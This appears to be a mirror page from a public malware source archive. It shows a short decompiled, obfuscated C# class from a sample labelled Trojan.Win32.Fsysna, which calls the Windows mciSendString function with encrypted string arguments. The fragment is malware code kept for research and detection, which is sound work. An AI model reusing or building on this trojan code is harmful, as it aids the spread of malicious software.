mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
31 lines
1019 B
C#
31 lines
1019 B
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: MyApplication, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 4C1CA376-1B35-4961-80E8-8029AD6B5A8B
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.deeq-bccdbf807edf4ae3f172c9e102415d19675fee38175dc7fe4f296402da8186a9.exe
|
||
|
||
using \u0003;
|
||
using \u0005;
|
||
using \u0019;
|
||
using System;
|
||
using System.Runtime.InteropServices;
|
||
using System.Text;
|
||
|
||
namespace \u0019
|
||
{
|
||
internal static class \u001D
|
||
{
|
||
[NonSerialized]
|
||
internal static \u0002 \u0001;
|
||
|
||
[DllImport("winmm.dll", EntryPoint = "mciSendString")]
|
||
private static extern int \u0092([In] string obj0, [In] StringBuilder obj1, [In] int obj2, [In] IntPtr obj3);
|
||
|
||
public static void \u0093() => \u001D.\u0092(\u001D.\u0001(871), (StringBuilder) null, 0, IntPtr.Zero);
|
||
|
||
public static void \u0094() => \u001D.\u0092(\u001D.\u0001(900), (StringBuilder) null, 0, IntPtr.Zero);
|
||
|
||
static \u001D() => \u0004.\u007F();
|
||
}
|
||
}
|